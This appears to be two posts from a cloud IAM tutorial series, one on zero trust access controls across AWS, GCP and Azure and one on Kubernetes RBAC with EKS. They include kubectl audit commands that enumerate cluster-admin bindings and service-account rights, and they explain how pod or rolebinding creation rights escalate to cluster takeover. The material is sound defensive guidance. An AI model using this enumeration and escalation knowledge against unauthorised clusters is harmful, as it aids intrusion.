Zero Trust Access in the Cloud: How the Evaluation Loop Actually Works

Reading Time: 10 minutes

Meta Description: Understand how zero trust access in the cloud works end to end — continuous verification, least privilege enforcement, and the full policy evaluation loop.


What Is Cloud IAMAuthentication vs AuthorizationIAM Roles vs PoliciesAWS IAM Deep DiveGCP Resource Hierarchy IAMAzure RBAC ScopesOIDC Workload IdentityAWS IAM Privilege EscalationAWS Least Privilege AuditSAML vs OIDC FederationKubernetes RBAC and AWS IAMZero Trust Access in the Cloud


TL;DR

  • Zero Trust: trust nothing implicitly, verify everything explicitly, minimize blast radius by assuming you will be breached
  • Network location is not identity — VPN is authentication for the tunnel, not authorization for the resource
  • JIT privilege elevation removes standing admin access: engineers request elevation for a specific purpose, scoped to a specific duration
  • Device posture is an access signal — a compromised endpoint with valid credentials is still a threat; Conditional Access gates on device compliance
  • Continuous session validation re-evaluates signals throughout the session — device falls out of compliance, sessions revoke in minutes, not at expiry
  • The highest-ROI early moves: eliminate machine static credentials, enforce MFA on all human access, federate to a single IdP

The Big Picture

  ZERO TRUST IAM — EVERY REQUEST EVALUATED INDEPENDENTLY

  API call arrives
         │
         ▼
  Identity verified? ──── No ────► DENY
         │
        Yes
         │
         ▼
  Device compliant? ───── No ────► DENY (or step-up MFA)
         │
        Yes
         │
         ▼
  Policy allows this  ─── No ────► DENY
  action on this ARN?
         │
        Yes
         │
         ▼
  Conditions met? ─────── No ────► DENY
  (time, IP, MFA age,              (e.g., outside business hours,
   risk score, session)             impossible travel detected)
         │
        Yes
         │
         ▼
       ALLOW ──────────────────────► LOG every decision (allow and deny)
         │
         └── Continuous re-evaluation:
             device state changes → revoke
             anomaly detected → revoke or step-up
             credential age → require re-auth

Introduction

The perimeter model of network security made a bet: inside the network is trusted, outside is not. Lock down the perimeter tightly enough and you’re safe. VPN in, and you’re one of us.

I grew up professionally in that model. Firewalls, DMZs, trusted zones. The idea had intuitive appeal — you build walls, you control what crosses them. For a while it worked reasonably well.

Then I watched it fail, repeatedly, in ways that were predictable in hindsight. An engineer’s laptop gets compromised at a coffee shop. They VPN in. Now the attacker is “inside.” A contractor account gets phished. They have valid Active Directory credentials. They’re inside. A cloud service gets misconfigured and exposes a management interface. There’s no perimeter for that to be inside of.

The perimeter model failed not because the walls weren’t strong enough, but because the premise was wrong. There is no inside. There is no perimeter that reliably separates trusted from untrusted. In a world of remote work, cloud services, contractor access, and API integrations, the attack surface doesn’t respect network boundaries.

Zero Trust is the architecture built on a different premise: trust nothing implicitly. Verify everything explicitly. Minimize blast radius by assuming you will be breached.

This isn’t a product you buy. It’s a set of principles applied to how you design, build, and operate your IAM. This episode is how those principles translate to concrete practices — building on everything we’ve covered in this series.


The Three Principles

Verify Explicitly

Every request must carry verifiable identity and context. Network location is not identity.

Old model: request from 10.0.0.0/8 → trusted, proceed
Zero Trust: request from 10.0.0.0/8 → still must present verifiable identity
                                       still must pass authorization check
                                       still must pass context evaluation
                                       then proceed (or deny)

In cloud IAM terms: every API call carries identity claims (IAM role ARN, federated identity, managed identity), and those claims are verified against policy on every single request. There’s no concept of “once authenticated, trusted until logout.” In cloud IAM, this already exists natively. Every API call is authenticated and authorized independently. The challenge is extending this model to internal services, internal APIs, and human access patterns.

Implementation in practice:
– mTLS for service-to-service communication — both sides present certificates; identity is the certificate, not the network path
– Bearer tokens on every internal API call — no session cookies, no “we’re on the same VPC so it’s fine”
– Short-lived credentials everywhere — a compromised credential expires, not “after the session times out in 8 hours”

Use Least Privilege — Just-in-Time, Just-Enough

No standing access to sensitive resources. Access granted when needed, for the minimum scope, for the minimum duration.

Old model: alice is in the DBA group → permanent access to all databases
Zero Trust: alice requests access to production DB →
            verified: alice's device is enrolled in MDM and compliant
            verified: alice has an open change ticket for this task
            verified: current time is within business hours
            granted: connection to this specific database, from alice's specific IP
                     for 2 hours, then revoked automatically

This is JIT access. It reduces the window where a compromised credential can cause damage. It requires a change in how engineers think about access: access is not a property you have, it’s something you request when you need it. The operational friction is a feature, not a bug. Justifying each elevated access request is what keeps the access model honest.

Assume Breach

Design systems as if the attacker is already inside. This drives different decisions:

  • Micro-segmentation: one role per service, minimum permissions per role. If one service is compromised, it can’t pivot to everything else.
  • Log everything: every authorization decision, allow or deny. When you’re investigating an incident, you need to know what happened, not just that something happened.
  • Automate response: anomalous API call pattern → trigger automated credential revocation or session termination. Don’t wait for a human to notice.

Building Zero Trust IAM — Block by Block

Block 1: Strong Identity Foundation

You can’t verify explicitly without strong authentication. The starting point:

# AWS: require MFA for all IAM operations — enforce via SCP across the org
{
  "Effect": "Deny",
  "Action": "*",
  "Resource": "*",
  "Condition": {
    "BoolIfExists": {
      "aws:MultiFactorAuthPresent": "false"
    },
    "StringNotLike": {
      "aws:PrincipalArn": [
        "arn:aws:iam::*:role/AWSServiceRole*",
        "arn:aws:iam::*:role/OrganizationAccountAccessRole"
      ]
    }
  }
}
# GCP: enforce OS Login for VM SSH (ties SSH access to Google identity, not SSH keys)
gcloud compute project-info add-metadata \
  --metadata enable-oslogin=TRUE

# This means: SSH to a VM requires your Google identity to have roles/compute.osLogin
# or roles/compute.osAdminLogin. No more managing ~/.authorized_keys files on instances.

For human access: hardware FIDO2 keys (YubiKey, Google Titan) rather than TOTP where possible. TOTP codes can be phished in real-time adversary-in-the-middle attacks. Hardware keys cannot — the cryptographic challenge-response is bound to the origin URL.

Block 2: Device Posture as an Access Signal

In a Zero Trust model, the identity of the user is necessary but not sufficient. The state of the device matters too — a compromised endpoint with valid credentials is still a threat.

# Azure Conditional Access: block access from non-compliant devices
# (configures in Entra ID Conditional Access portal)
conditions:
  clientAppTypes: [browser, mobileAppsAndDesktopClients]
  devices:
    deviceFilter:
      mode: exclude
      rule: "device.isCompliant -eq True and device.trustType -eq 'AzureAD'"
grantControls:
  builtInControls: [compliantDevice]
# AWS Verified Access: identity + device posture for application access — no VPN
aws ec2 create-verified-access-instance \
  --description "Zero Trust app access"

# Attach identity trust provider (Okta OIDC)
aws ec2 create-verified-access-trust-provider \
  --trust-provider-type user \
  --user-trust-provider-type oidc \
  --oidc-options IssuerURL=https://company.okta.com,ClientId=...,ClientSecret=...,Scope=openid

# Attach device trust provider (Jamf, Intune, or CrowdStrike)
aws ec2 create-verified-access-trust-provider \
  --trust-provider-type device \
  --device-trust-provider-type jamf \
  --device-options TenantId=JAMF_TENANT_ID

AWS Verified Access allows users to reach internal applications by verifying both their identity (via OIDC) and their device health (via MDM) — without a VPN. The access gateway evaluates both signals on every connection, not just at login.

Block 3: Just-in-Time Privilege Elevation

No standing elevated access. Engineers are eligible for elevated roles; they activate them when needed.

# Azure PIM: engineer activates an eligible privileged role
az rest --method POST \
  --uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignmentScheduleRequests" \
  --body '{
    "action": "selfActivate",
    "principalId": "USER_OBJECT_ID",
    "roleDefinitionId": "ROLE_DEF_ID",
    "directoryScopeId": "/",
    "justification": "Investigating security alert in tenant — incident ticket INC-2026-0411",
    "scheduleInfo": {
      "startDateTime": "2026-04-11T09:00:00Z",
      "expiration": {"type": "AfterDuration", "duration": "PT4H"}
    }
  }'
# Access activates, lasts 4 hours, then automatically removed
# AWS: temporary account assignment via Identity Center
# (typically triggered by ITSM workflow integration, not manual CLI)
aws sso-admin create-account-assignment \
  --instance-arn "arn:aws:sso:::instance/ssoins-xxx" \
  --target-id ACCOUNT_ID \
  --target-type AWS_ACCOUNT \
  --permission-set-arn "arn:aws:sso:::permissionSet/ssoins-xxx/ps-yyy" \
  --principal-type USER \
  --principal-id USER_ID

# Schedule deletion (using EventBridge + Lambda in a real deployment)
aws sso-admin delete-account-assignment \
  --instance-arn "arn:aws:sso:::instance/ssoins-xxx" \
  --target-id ACCOUNT_ID \
  --target-type AWS_ACCOUNT \
  --permission-set-arn "arn:aws:sso:::permissionSet/ssoins-xxx/ps-yyy" \
  --principal-type USER \
  --principal-id USER_ID

The operational change this requires: engineers stop thinking of access as something they hold permanently and start thinking of it as something they request for a specific purpose.

This feels like friction until you’re investigating an incident and you have a precise record of who activated what elevated access and why.

Block 4: Continuous Session Validation

Traditional auth: verify once at login, trust the session until timeout.
Zero Trust auth: re-evaluate access signals continuously throughout the session.

Session starts: identity verified + device compliant + IP in expected range
                → access granted

15 minutes later: impossible travel detected (IP changes to different country)
                  → step-up authentication required, or session terminated

Later: device compliance state changes (EDR detects malware)
       → all active sessions for this device revoked immediately

This requires integration between your identity platform and your device management / EDR tooling. Entra ID Conditional Access with Continuous Access Evaluation (CAE) implements this natively. When certain events occur — device compliance change, IP anomaly, token revocation — access tokens are invalidated within minutes rather than waiting for natural expiry.

// GCP: bind IAM access to an Access Context Manager access level
// Access level enforces device compliance — if device falls out of compliance,
// the access level is no longer satisfied and requests fail immediately
gcloud projects add-iam-policy-binding my-project \
  --member="user:[email protected]" \
  --role="roles/bigquery.admin" \
  --condition="expression=request.auth.access_levels.exists(x, x == 'accessPolicies/POLICY_NUM/accessLevels/corporate_compliant_device'),title=Compliant device required"

Block 5: Micro-Segmented Permissions

Every service has its own identity. Every identity has only what it needs. Compromise of one service cannot propagate to others.

# Terraform: IAM as code — each service gets a dedicated, scoped role
resource "aws_iam_role" "order_processor" {
  name                 = "svc-order-processor"
  permissions_boundary = aws_iam_policy.service_boundary.arn

  assume_role_policy = jsonencode({
    Version = "2012-10-17"
    Statement = [{
      Effect    = "Allow"
      Principal = { Service = "lambda.amazonaws.com" }
      Action    = "sts:AssumeRole"
    }]
  })
}

resource "aws_iam_role_policy" "order_processor" {
  name   = "order-processor-policy"
  role   = aws_iam_role.order_processor.id
  policy = jsonencode({
    Version = "2012-10-17"
    Statement = [
      {
        Effect   = "Allow"
        Action   = ["sqs:ReceiveMessage", "sqs:DeleteMessage", "sqs:GetQueueAttributes"]
        Resource = aws_sqs_queue.orders.arn
      },
      {
        Effect   = "Allow"
        Action   = ["dynamodb:PutItem", "dynamodb:GetItem", "dynamodb:UpdateItem"]
        Resource = aws_dynamodb_table.orders.arn
      }
    ]
  })
}
# Open Policy Agent: enforce IAM standards at the policy level
# Run this in CI/CD — fail the build if any policy statement has wildcard actions
package iam.policy

deny[msg] {
  input.Statement[i].Effect == "Allow"
  input.Statement[i].Action == "*"
  msg := sprintf("Statement %d has wildcard Action — not allowed", [i])
}

deny[msg] {
  input.Statement[i].Effect == "Allow"
  input.Statement[i].Resource == "*"
  endswith(input.Statement[i].Action, "Delete")
  msg := sprintf("Statement %d allows Delete on all resources — requires specific ARN", [i])
}

Block 6: Universal Audit Trail

Zero Trust without logging is just obscurity. Every authorization decision — allow and deny — must be logged, retained, and queryable.

# AWS: verify CloudTrail is comprehensive
aws cloudtrail get-trail-status --name management-trail
# Must have: LoggingEnabled=true, IsMultiRegionTrail=true, IncludeGlobalServiceEvents=true

# Verify no management events are excluded
aws cloudtrail get-event-selectors --trail-name management-trail \
  | jq '.EventSelectors[] | {ReadWrite: .ReadWriteType, Mgmt: .IncludeManagementEvents}'
# ReadWriteType should be "All"; IncludeManagementEvents should be true

# GCP: ensure Data Access audit logs are enabled for IAM
gcloud projects get-iam-policy my-project --format=json | jq '.auditConfigs'
# Should see auditLogConfigs for cloudresourcemanager.googleapis.com and iam.googleapis.com
# with both DATA_READ and DATA_WRITE enabled

# Azure: route Entra ID logs to Log Analytics for long-term retention and querying
az monitor diagnostic-settings create \
  --name entra-audit-to-la \
  --resource "/tenants/TENANT_ID/providers/microsoft.aad/domains/company.com" \
  --logs '[{"category":"AuditLogs","enabled":true},{"category":"SignInLogs","enabled":true}]' \
  --workspace /subscriptions/SUB_ID/resourceGroups/rg-monitoring/providers/Microsoft.OperationalInsights/workspaces/security-logs

Framework Alignment

Zero Trust IAM isn’t a framework itself — it’s a design philosophy. But it maps cleanly onto the controls that compliance frameworks are pushing organizations toward:

Framework Reference What It Covers Here
CISSP Domain 5 — IAM Zero Trust reframes IAM as continuous, context-aware verification rather than perimeter-based trust
CISSP Domain 1 — Security & Risk Management Assume breach as a risk management posture; blast radius minimization through least privilege
CISSP Domain 7 — Security Operations Continuous monitoring, anomaly detection, and automated response are operational requirements of Zero Trust
ISO 27001:2022 5.15 Access control Zero Trust access policy: verify explicitly, least privilege, assume breach
ISO 27001:2022 8.16 Monitoring activities Continuous session validation and universal audit trail — all authorization decisions logged
ISO 27001:2022 8.20 Networks security Micro-segmentation and mTLS replace implicit network trust with verified identity at every hop
ISO 27001:2022 5.23 Information security for cloud services Zero Trust architecture applied to cloud IAM across AWS, GCP, and Azure
SOC 2 CC6.1 Zero Trust logical access controls — JIT, device posture, context-aware authorization
SOC 2 CC6.7 Continuous session validation and transmission controls across all system components
SOC 2 CC7.1 Threat detection through universal audit trails and anomaly-triggered automated response
SOC 2 CC7.2 Incident response — automated revocation and session termination on anomaly detection

Zero Trust Maturity — Where to Start

In practice, most organizations think about Zero Trust as a destination — a large, multi-year program. The reality is it’s a direction. Any movement in that direction reduces risk.

Level Where You Are What to Build Next
1 — Initial Some MFA; static credentials for machines; no centralized IdP Eliminate machine static keys → workload identity
2 — Managed Centralized IdP; SSO for most systems; some MFA enforcement Close SSO gaps; enforce MFA everywhere; federate to cloud
3 — Defined Least privilege being enforced; audit tooling in use; JIT for some privileged access Expand JIT; policy-as-code in CI/CD; quarterly access reviews
4 — Contextual Device posture in access decisions; conditional access policies Continuous session evaluation; automated anomaly response
5 — Optimizing Policy-as-code everywhere; automated right-sizing; anomaly-triggered revocation Refine and maintain — Zero Trust is never “done”

The jump from Level 1 to Level 3 delivers the most security value per unit of effort. Start there. Don’t defer least privilege enforcement while you build a sophisticated device posture integration.


The Practical Sequence

If you’re building Zero Trust IAM from where most organizations are, this is the order that maximizes early security value:

  1. Inventory all identities — human and machine. You cannot secure what you can’t see. Build a complete picture before changing anything.

  2. Eliminate static credentials for machines — replace access keys and SA key files with workload identity. This is the highest-ROI change in most environments.

  3. Enforce MFA for all human access — especially cloud consoles, IdP admin, and VPN. Hardware keys for privileged accounts.

  4. Federate human identity — single IdP, SSO to cloud and major applications. Centralize the revocation path.

  5. Right-size IAM permissions — use last-accessed data and IAM Recommender to find and remove unused permissions. This is a continuous discipline, not a one-time clean-up.

  6. JIT for privileged access — Azure PIM, AWS Identity Center assignment automation, or equivalent for all elevated roles. No standing admin.

  7. IAM as code — all IAM changes via Terraform/Pulumi/CDK, reviewed in pull requests, validated by Access Analyzer or OPA in CI/CD, applied through automation.

  8. Continuous monitoring — alerts on IAM mutations, anomalous API call patterns, new cross-account trust relationships, new public resource exposures.

  9. Add context signals — Conditional Access policies incorporating device posture. Access Context Manager in GCP. AWS Verified Access for application access.

  10. Automated response — anomaly detected → automatic credential suspension or session termination. Close the window between detection and containment.


Series Complete

This series covered Cloud IAM from the question “what even is IAM?” to Zero Trust architecture:

Episode Topic The Core Lesson
EP01 What is IAM? Access management is deny-by-default; every grant is an explicit decision
EP02 AuthN vs AuthZ Two separate gates; passing one doesn’t open the other
EP03 Roles, Policies, Permissions Structure prevents drift; wildcards accumulate into exposure
EP04 AWS IAM Deep Dive Trust policies and permission policies are both required; the evaluation chain has six layers
EP05 GCP IAM Deep Dive Hierarchy inheritance is a feature that needs careful handling; service account keys are an antipattern
EP06 Azure RBAC and Entra ID Two separate authorization planes; managed identities are the right model for workloads
EP07 Workload Identity Static credentials for machines are solvable at the root; OIDC token exchange replaces them
EP08 IAM Attack Paths The attack chain runs through IAM; iam:PassRole and its equivalents are privilege escalation primitives
EP09 Least Privilege Auditing 5% utilization is the average; the 95% excess is attack surface — and it’s measurable
EP10 Federation, OIDC, SAML The IdP is the trust anchor; everything downstream is bounded by its security
EP11 Kubernetes RBAC Two separate IAM layers; both must be secured; cluster-admin is the first thing to audit
EP12 Zero Trust IAM Trust nothing implicitly; verify everything explicitly; minimize blast radius through least privilege at every layer

IAM is not a feature you configure. It’s a practice you maintain. The organizations that operate with genuinely low cloud IAM risk don’t have fewer identities — they have better visibility into what those identities can do, and why, and what happened when something went wrong.

That’s what this series has been building toward.


The full series is at linuxcent.com/cloud-iam-series. If you found it useful, the best thing you can do is subscribe — the next series covers eBPF: what’s actually running in kernel space when Cilium, Falco, and Tetragon are doing their work.

Subscribe → linuxcent.com/subscribe

Kubernetes RBAC and AWS IAM: The Two-Layer Access Model for EKS

Reading Time: 9 minutes

Meta Description: Understand how Kubernetes RBAC and AWS IAM interact in EKS — map the two-layer access model and debug permission failures across both control planes.


What Is Cloud IAMAuthentication vs AuthorizationIAM Roles vs PoliciesAWS IAM Deep DiveGCP Resource Hierarchy IAMAzure RBAC ScopesOIDC Workload IdentityAWS IAM Privilege EscalationAWS Least Privilege AuditSAML vs OIDC FederationKubernetes RBAC and AWS IAM


TL;DR

  • Kubernetes RBAC and cloud IAM are separate authorization layers — strong cloud IAM with weak Kubernetes RBAC is still a vulnerable cluster
  • cluster-admin ClusterRoleBindings are the first thing to audit — a compromised pod with cluster-admin controls the entire cluster
  • Disable automountServiceAccountToken on pods that don’t call the Kubernetes API — most application pods don’t need it mounted
  • Use OIDC for human access instead of X.509 client certificates — client certs cannot be revoked without rotating the CA
  • Bind groups from IdP, not individual usernames — revocation propagates automatically when someone leaves
  • A ServiceAccount that can create pods or create rolebindings is a privilege escalation path: the same class of risk as iam:PassRole

The Big Picture

  TWO AUTHORIZATION LAYERS — NEITHER COMPENSATES FOR THE OTHER

  ┌─────────────────────────────────────────────────────────────────┐
  │  CLOUD IAM LAYER  (AWS IAM / GCP IAM / Azure RBAC)             │
  │  Controls: S3, DynamoDB, Lambda, RDS, cloud services           │
  │  Human: federated identity from IdP (SAML / OIDC)             │
  │  Machine: IRSA annotation → IAM role / GKE WI / AKS WI        │
  │  Audit: CloudTrail, GCP Audit Logs, Azure Monitor              │
  └─────────────────────────────────────────────────────────────────┘
           ↕ separate systems — no inheritance in either direction
  ┌─────────────────────────────────────────────────────────────────┐
  │  KUBERNETES RBAC LAYER  (within the cluster)                   │
  │  Controls: pods, secrets, deployments, configmaps, namespaces  │
  │  Human: OIDC groups → ClusterRoleBinding (or RoleBinding)      │
  │  Machine: ServiceAccount → Role / ClusterRole                  │
  │  Audit: kube-apiserver audit log                               │
  └─────────────────────────────────────────────────────────────────┘

  Attack path: exploit app pod → SA has cluster-admin → own the cluster
  Audit finding: cluster-admin on app SA, regardless of cloud IAM posture

Introduction

I spent a long time in Kubernetes environments thinking cloud IAM and Kubernetes RBAC were related in a way that meant securing one partially covered the other. They don’t. They’re separate authorization systems that happen to share infrastructure.

The moment this crystallized for me: I was auditing an EKS cluster for a fintech company. Their AWS IAM posture was actually quite good — least privilege roles, no wildcard policies, SCPs in place at the org level. I was about to give them a clean bill of health when I ran one command:

kubectl get clusterrolebindings -o json | \
  jq '.items[] | select(.roleRef.name=="cluster-admin") | {name:.metadata.name, subjects:.subjects}'

The output showed five ClusterRoleBindings to cluster-admin. Two of them bound it to service accounts in production namespaces. One of those service accounts was used by an application that processed customer transactions.

cluster-admin in Kubernetes is the equivalent of AdministratorAccess in AWS. An attacker who compromises a pod running as that service account doesn’t just have access to the application’s data. They have control of the entire cluster: reading every secret in every namespace, deploying arbitrary workloads, modifying RBAC bindings to create persistence.

None of this showed up in the AWS IAM audit. AWS IAM and Kubernetes RBAC are separate systems. Securing one tells you nothing about the other.


Kubernetes RBAC Architecture

Kubernetes RBAC works with four object types:

Object Scope What It Does
Role Single namespace Defines permissions within one namespace
ClusterRole Cluster-wide Permissions across all namespaces, or for non-namespaced resources
RoleBinding Single namespace Binds a Role (or ClusterRole) to subjects, scoped to one namespace
ClusterRoleBinding Cluster-wide Binds a ClusterRole to subjects with cluster-wide scope

Subjects — the identities that receive the binding — are:
User: an external identity (Kubernetes has no native user objects; users come from the authenticator)
Group: a group of external identities
ServiceAccount: a Kubernetes-native machine identity, namespaced

The scoping matters. A ClusterRole defines what permissions exist. A RoleBinding applies that ClusterRole within a single namespace. A ClusterRoleBinding applies it everywhere. The same permissions, dramatically different blast radius.


Roles and ClusterRoles

# Role: read pods and their logs — scoped to the default namespace only
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  namespace: default
  name: pod-reader
rules:
- apiGroups: [""]          # "" = core API group (pods, secrets, configmaps, etc.)
  resources: ["pods", "pods/log"]
  verbs: ["get", "list", "watch"]
# ClusterRole: manage Deployments across all namespaces
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: deployment-manager
rules:
- apiGroups: ["apps"]
  resources: ["deployments", "replicasets"]
  verbs: ["get", "list", "watch", "create", "update", "patch", "delete"]
- apiGroups: [""]
  resources: ["pods"]
  verbs: ["get", "list", "watch"]

The verbs map to HTTP methods against the Kubernetes API: get reads a specific resource, list returns a collection, watch streams changes, create/update/patch/delete are mutations.

One that consistently surprises people: list on secrets returns secret values in some Kubernetes versions and configurations. You might think “list” is just metadata, but listing secrets can include their data. If a service account needs to check whether a secret exists, grant get on the specific secret name. Avoid list on the secrets resource.

The Wildcard Risk

# This is effectively cluster-admin in the default namespace — avoid
rules:
- apiGroups: ["*"]
  resources: ["*"]
  verbs: ["*"]

Any * in RBAC rules is an audit finding. In practice I find wildcards most often in:
– Operator and controller service accounts (understandable, but worth reviewing)
– “Temporary” RBAC that became permanent
– Developer tooling given cluster-admin “because it was easier”

Run this to find all ClusterRoles with wildcard verbs:

kubectl get clusterroles -o json | \
  jq '.items[] | select(.rules[]?.verbs[] == "*") | .metadata.name'

Bindings — Connecting Identities to Roles

# RoleBinding: alice can read pods in the default namespace
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: alice-pod-reader
  namespace: default
subjects:
- kind: User
  name: [email protected]
  apiGroup: rbac.authorization.k8s.io
roleRef:
  kind: Role
  name: pod-reader
  apiGroup: rbac.authorization.k8s.io
# ClusterRoleBinding: Prometheus can read cluster-wide (monitoring use case)
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: prometheus-cluster-reader
subjects:
- kind: ServiceAccount
  name: prometheus
  namespace: monitoring
roleRef:
  kind: ClusterRole
  name: view
  apiGroup: rbac.authorization.k8s.io

An important pattern: a RoleBinding can reference a ClusterRole. This lets you define a role once at the cluster level (the ClusterRole) and bind it within specific namespaces through RoleBindings. The permissions are still scoped to the namespace where the RoleBinding lives. This is the right pattern for shared role definitions — define the permission set once, instantiate it with appropriate scope.

Default to RoleBinding over ClusterRoleBinding for namespace-scoped work. ClusterRoleBinding should be reserved for genuinely cluster-wide operations: monitoring agents, network plugins, cluster operators, security tooling.


Service Accounts — The Machine Identity in Kubernetes

Every pod in Kubernetes runs as a service account. If you don’t specify one, it uses the default service account in the pod’s namespace.

The default service account is where many RBAC misconfigurations accumulate. When someone creates a RoleBinding without thinking about which SA to use, they often bind the permission to default. Now every pod in that namespace that doesn’t explicitly set a service account — including pods deployed by developers who aren’t thinking about RBAC — inherits that binding.

# Create a dedicated SA for each application
kubectl create serviceaccount app-backend -n production

# Check what any SA can currently do — use this in every audit
kubectl auth can-i --list --as=system:serviceaccount:production:app-backend -n production

# Check a specific action
kubectl auth can-i get secrets \
  --as=system:serviceaccount:production:app-backend -n production

kubectl auth can-i create pods \
  --as=system:serviceaccount:production:app-backend -n production

Disable Auto-Mounting the SA Token

By default, Kubernetes mounts the service account token into every pod at /var/run/secrets/kubernetes.io/serviceaccount/token. A pod that doesn’t need to call the Kubernetes API doesn’t need this token. Having it mounted increases the blast radius if the pod is compromised — the token can be used to call the K8s API with whatever RBAC permissions the SA has.

# Disable at the pod level
apiVersion: v1
kind: Pod
spec:
  automountServiceAccountToken: false
  serviceAccountName: app-backend
  containers:
  - name: app
    image: my-app:latest

# Or at the service account level (applies to all pods using this SA)
apiVersion: v1
kind: ServiceAccount
metadata:
  name: app-backend
  namespace: production
automountServiceAccountToken: false

For most application pods — anything that isn’t a Kubernetes operator, controller, or management tool — the K8s API token is unnecessary. Disable it.


Human Access to Kubernetes — Get Off Client Certificates

Kubernetes doesn’t manage human users natively. Authentication is delegated to an external mechanism. The most common approaches:

Method Notes
X.509 client certificates Common for initial cluster setup; credentials are embedded in kubeconfig; cannot be revoked without revoking the CA
Static bearer tokens Long-lived; avoid
OIDC via external IdP Preferred for human access — supports SSO, MFA, and revocation via IdP
Webhook auth Flexible, requires custom infrastructure

X.509 certificates are the bootstrap pattern. Every managed Kubernetes offering generates an admin kubeconfig with a client certificate. The problem: you can’t revoke individual certificates without rotating the CA. If you’re giving human engineers access via client certificates, someone leaving doesn’t actually lose cluster access until the certificate expires.

OIDC is the right model. Configure the kube-apiserver to accept JWTs from your IdP, bind RBAC permissions to groups from the IdP, and revocation becomes “remove from IdP group” rather than “hope the certificate expires soon”:

# kube-apiserver flags for OIDC (managed clusters configure this via provider settings)
--oidc-issuer-url=https://accounts.google.com
--oidc-client-id=my-cluster-client-id
--oidc-username-claim=email
--oidc-groups-claim=groups
--oidc-groups-prefix=oidc:
# User's kubeconfig — uses an exec plugin to fetch an OIDC token
users:
- name: alice
  user:
    exec:
      apiVersion: client.authentication.k8s.io/v1beta1
      command: kubectl-oidc-login
      args:
        - get-token
        - --oidc-issuer-url=https://dex.company.com
        - --oidc-client-id=kubernetes

With managed clusters:

# EKS: add IAM role as a cluster access entry (replaces the aws-auth ConfigMap)
aws eks create-access-entry \
  --cluster-name my-cluster \
  --principal-arn arn:aws:iam::123456789012:role/DevTeamRole \
  --type STANDARD

aws eks associate-access-policy \
  --cluster-name my-cluster \
  --principal-arn arn:aws:iam::123456789012:role/DevTeamRole \
  --policy-arn arn:aws:eks::aws:cluster-access-policy/AmazonEKSViewPolicy \
  --access-scope type=namespace,namespaces=production,staging

# GKE: get credentials; IAM roles map to cluster permissions
gcloud container clusters get-credentials my-cluster --region us-central1
# roles/container.developer → edit permissions
# But: use ClusterRoleBindings for fine-grained control rather than relying on GCP IAM roles

# AKS: bind Entra ID groups to Kubernetes RBAC
az aks get-credentials --name my-aks --resource-group rg-prod
kubectl create clusterrolebinding dev-team-view \
  --clusterrole=view \
  --group=ENTRA_GROUP_OBJECT_ID

Cloud IAM + Kubernetes RBAC: The Integration Points

EKS Pod Identity / IRSA (revisited)

The annotation on the Kubernetes ServiceAccount is the bridge:

apiVersion: v1
kind: ServiceAccount
metadata:
  name: app-backend
  namespace: production
  annotations:
    eks.amazonaws.com/role-arn: arn:aws:iam::123456789012:role/AppBackendRole

Kubernetes RBAC controls what the pod can do inside the cluster. The IAM role controls what the pod can do in AWS. Both must be explicitly granted; neither inherits from the other.

GKE Workload Identity

apiVersion: v1
kind: ServiceAccount
metadata:
  name: app-backend
  namespace: production
  annotations:
    iam.gke.io/gcp-service-account: [email protected]

AKS Workload Identity

apiVersion: v1
kind: ServiceAccount
metadata:
  name: app-backend
  namespace: production
  annotations:
    azure.workload.identity/client-id: "MANAGED_IDENTITY_CLIENT_ID"
---
apiVersion: v1
kind: Pod
metadata:
  labels:
    azure.workload.identity/use: "true"
spec:
  serviceAccountName: app-backend

RBAC Audit — What to Check First

# Start here: who has cluster-admin?
kubectl get clusterrolebindings -o json | \
  jq '.items[] | select(.roleRef.name=="cluster-admin") | 
      {binding: .metadata.name, subjects: .subjects}'
# cluster-admin should bind to almost nobody — review every result

# Find ClusterRoles with wildcard permissions
kubectl get clusterroles -o json | \
  jq '.items[] | select(.rules[]?.verbs[]? == "*") | .metadata.name'

# What can the default SA do in each namespace?
for ns in $(kubectl get namespaces -o name | cut -d/ -f2); do
  echo "=== $ns ==="
  kubectl auth can-i --list --as=system:serviceaccount:${ns}:default -n ${ns} 2>/dev/null \
    | grep -v "no" | head -10
done

# What can a specific SA do?
kubectl auth can-i --list \
  --as=system:serviceaccount:production:app-backend \
  -n production

# Check whether an SA can escalate — key risk indicators
kubectl auth can-i get secrets -n production \
  --as=system:serviceaccount:production:app-backend
kubectl auth can-i create pods -n production \
  --as=system:serviceaccount:production:app-backend
kubectl auth can-i create rolebindings -n production \
  --as=system:serviceaccount:production:app-backend

Creating pods and creating rolebindings are privilege escalation primitives. A service account that can create pods can run a pod with a different, more powerful SA. A service account that can create rolebindings can grant itself more permissions.

Useful Tools

# rbac-tool — visualize and analyze RBAC (install: kubectl krew install rbac-tool)
kubectl rbac-tool viz                              # generate a graph of all bindings
kubectl rbac-tool who-can get secrets -n production
kubectl rbac-tool lookup [email protected]

# rakkess — access matrix for a subject
kubectl rakkess --sa production:app-backend

# audit2rbac — generate minimal RBAC from audit logs
audit2rbac --filename /var/log/kubernetes/audit.log \
  --serviceaccount production:app-backend

Common RBAC Misconfigurations

Misconfiguration Risk Fix
cluster-admin bound to application SA Full cluster takeover from compromised pod Minimal ClusterRole; scope to namespace where possible
list or wildcard on secrets Read all secrets in scope — includes credentials, API keys Grant get on specific named secrets only
default SA with non-trivial permissions Every pod in the namespace inherits the permission Bind permissions to dedicated SAs; automountServiceAccountToken: false on default
ClusterRoleBinding for namespace-scoped work Namespace work with cluster-wide permission Always prefer RoleBinding; ClusterRoleBinding only for genuinely cluster-wide needs
Binding users by username string Hard to revoke; doesn’t sync with IdP Bind groups from IdP; revocation propagates through group membership
SA can create pods or create rolebindings Privilege escalation path Audit and remove these from non-privileged SAs

Framework Alignment

Framework Reference What It Covers Here
CISSP Domain 5 — Identity and Access Management Kubernetes RBAC operates as a full IAM system at the platform layer, independent of cloud IAM
CISSP Domain 3 — Security Architecture Two independent authorization layers (cloud + K8s) must each be designed and audited — one does not compensate for the other
ISO 27001:2022 5.15 Access control Kubernetes RBAC Roles, ClusterRoles, and bindings implement access control within the container platform
ISO 27001:2022 5.18 Access rights Service account provisioning, OIDC-based human access, and workload identity integration with cloud IAM
ISO 27001:2022 8.2 Privileged access rights cluster-admin and wildcard RBAC bindings represent the highest-privilege grants in Kubernetes
